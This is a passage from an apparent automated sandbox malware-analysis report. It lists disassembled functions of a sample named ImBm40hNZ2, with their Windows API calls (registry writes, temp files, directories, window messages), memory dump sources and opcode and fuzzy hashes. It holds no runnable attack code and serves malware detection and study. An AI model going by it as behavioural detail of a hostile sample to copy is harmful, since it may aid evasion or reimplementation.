                                                                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
                                                                                                                                                                                                                                                                • Instruction ID: 6b987b391dfe704e5e25f8c5ed1974f346454cd13820caa224fece71ffdffe90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D621B0B1A04208BFEF01AFB4CD4AAAE7BB5EF44344F10053EF541B61D1D6B89940D728
                                                                                                                                                                                                                                                                Function 3392EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d1182ed0f4ef07a922a665eaee65dd5e892d2b3d5d515311cf1cd60fb4786d3a
                                                                                                                                                                                                                                                                • Instruction ID: cb1bd5415dd209668cc29e7f1d98db2e68ae0e8b8360f9b85cd9229aa394f1e8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1182ed0f4ef07a922a665eaee65dd5e892d2b3d5d515311cf1cd60fb4786d3a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5E1DF75D00B08CFDB25CFA9C980A9EBBF9BF48354F14462AE586E7669D730A841CF50
                                                                                                                                                                                                                                                                Function 339DA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 82b18c640bf0db0895803f67c81f987c1681dda380af4f3e4fd9a9a8e320baac
                                                                                                                                                                                                                                                                • Instruction ID: ac8e88ded76fa1f40e28acd0a376662e081147299f2b7b1558f44dab055f99e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b18c640bf0db0895803f67c81f987c1681dda380af4f3e4fd9a9a8e320baac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8517D79704612DFEB18DE1CC892A1AB7E9FB8A390B14816DD906DB710DB71EC61CB80
                                                                                                                                                                                                                                                                Function 3397EBC0 Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 47166a070c635fc1b9e42bbeceba3772f34727c587edb11f746d8fc29e0becc9
                                                                                                                                                                                                                                                                • Instruction ID: 60423702780b62bc733517c101717ec6bc2b5c32474f71915738f18705cb6a76
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47166a070c635fc1b9e42bbeceba3772f34727c587edb11f746d8fc29e0becc9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 845124B6E00219DFEF04CF99D845ADDBBB5BF48390F14812AE815BB2A0D735A901CF54
                                                                                                                                                                                                                                                                Function 33937A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4281723722-0
                                                                                                                                                                                                                                                                • Opcode ID: 28475c6741cf6616b2bd3fc31c139f92db9a1b277e203e340dbebc0ca4b04517
                                                                                                                                                                                                                                                                • Instruction ID: 1cb7c379528e080025316a3eb406910974d8bd587d21c380a2261b3dd0a7f6a4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28475c6741cf6616b2bd3fc31c139f92db9a1b277e203e340dbebc0ca4b04517
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 743111B5E05318DFEF05EFA8D844A9EBBF5EB48321F10416AE921BB291CB315941CF50
                                                                                                                                                                                                                                                                Function 0040231C Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00409BC0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,00409BC0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00409BC0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1356686001-0
                                                                                                                                                                                                                                                                • Opcode ID: be294dc6e64afa6848476f7ead589d8a51d46e691ea1366307bbf61bada7ff34
                                                                                                                                                                                                                                                                • Instruction ID: 18d1fb4f89ff8b2d67b1f04eab716aa9824ced1508c62e5ffc4d870c518d25f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be294dc6e64afa6848476f7ead589d8a51d46e691ea1366307bbf61bada7ff34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F1190B1A00118BEEB10ABA5DE89EAF7678FB10358F10403AF905B61D0D7B86D01A668
                                                                                                                                                                                                                                                                Function 004015B3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,00435400,?,756A3410,00405471,?,00435400,756A3410,00000000), ref: 004056C8
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00434800,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3751793516-0
                                                                                                                                                                                                                                                                • Opcode ID: d48e94294e09c64e75ce65a3089d1a64d1edb5c6cce1281c45e4b49c5f9df717
                                                                                                                                                                                                                                                                • Instruction ID: baf4b22be7c240c0249859998ea5247985aaf7e7583e011f11e43f36ca2efb08
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d48e94294e09c64e75ce65a3089d1a64d1edb5c6cce1281c45e4b49c5f9df717
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45112531908150ABEB113F755D449AF37B0EA66365728473BF491B22E2C23C0D42962E
                                                                                                                                                                                                                                                                Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                                                                                                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                                                                                                                                                                                • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1404258612-0
                                                                                                                                                                                                                                                                • Opcode ID: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
                                                                                                                                                                                                                                                                • Instruction ID: 9073a6d5dd373040739bd7ba49bf73079916e51ed90b12fbca594bab97ee4bd6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51117071A00108BEDB01EFA5DD81DAEBBB9EF04344F20807AF505F21A1D7389E54DB28
                                                                                                                                                                                                                                                                Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,00000000,00402DA5,00000001), ref: 00402BD8
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402BF6
                                                                                                                                                                                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C21
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
                                                                                                                                                                                                                                                                • Instruction ID: 1e461717de66f8227c62b67df7ec3c369d4a9b771999132610b492aaebc5c7f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F05E30A09220AFC6319F20FE4CA9B7BA4F704B52F400876F501F12E4D7B49882DB9C
                                                                                                                                                                                                                                                                Function 339058E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 9dab38307d8115faddea2dd36c0c1d6fd47c71c3ec0b9f7a17d17d61662155b3
                                                                                                                                                                                                                                                                • Instruction ID: 625478b32482c7cf604a841c86222ee22158d13f68e1f4ca73dd8013ec0379a8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dab38307d8115faddea2dd36c0c1d6fd47c71c3ec0b9f7a17d17d61662155b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B3257B4D08329DFEB21CF64C984BD9BBB8BB08344F0480EAD559A7641DBB55A84CF90
                                                                                                                                                                                                                                                                Function 33934B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                                                                                                • Opcode ID: d4aa736f54fe9ee7e8e134e2787367a284d2bea71430fdda4c29309242b8b0fa
                                                                                                                                                                                                                                                                • Instruction ID: b07eaba207c6485b8ee13be2dc4c786e683e0d333ba937c07de1ef299b7133ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4aa736f54fe9ee7e8e134e2787367a284d2bea71430fdda4c29309242b8b0fa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB517BB5E02249CFEB24CF95C48469DFBF8EF457A5F59802AD045AB290EB70D985CB80
                                                                                                                                                                                                                                                                Function 33900485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • kLsE, xrefs: 339005FE
                                                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33900586
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                                                                • Opcode ID: 56acf2400b6451eac14beaf0281f90b3bdf2f77c465afbc6f9ee34dcf9ddfd7c
                                                                                                                                                                                                                                                                • Instruction ID: ffce6ec2006d851de27a47445ec1042a429166ae425c388eff0841548cb2a4ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56acf2400b6451eac14beaf0281f90b3bdf2f77c465afbc6f9ee34dcf9ddfd7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A351CCB5A0074ADFE720EFA6C4406EAB7F8AF04340F05843ED59987741EB389945CFA1
                                                                                                                                                                                                                                                                Function 338FDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                                                                                                • Opcode ID: 95c78958beecf3edd375bcc1ea57e8ae13dc6f01351414daf90fe69ee51ccdea
                                                                                                                                                                                                                                                                • Instruction ID: 8acd0292681d9dd2985c760294c00460789a43f950e40c49c46b8427916cc778
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95c78958beecf3edd375bcc1ea57e8ae13dc6f01351414daf90fe69ee51ccdea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96416DB1A087069FD300DF68D454E4ABBE4FB88358F04456EF588DB341D772EA09CB86
                                                                                                                                                                                                                                                                Function 00404DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404E1F
                                                                                                                                                                                                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404E70
                                                                                                                                                                                                                                                                  • Part of subcall function 00403ECB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EDD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
                                                                                                                                                                                                                                                                • Instruction ID: 735a5b7f30d8858267acffd8a6d90af7f660f30547e28e970091e6d44494b330
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D01D4B1100208ABDF216F11DC80E5B3B65F7C0755F148037F704762E1C3398C929BAA
                                                                                                                                                                                                                                                                Function 00405851 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405865
                                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 0040587F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                • Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                                                                                                                                                                                                                • Instruction ID: 4003a4fe6d6a1be2c7c6231cfd42d77a102930ba0be0d4b8b296abf0166e01cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
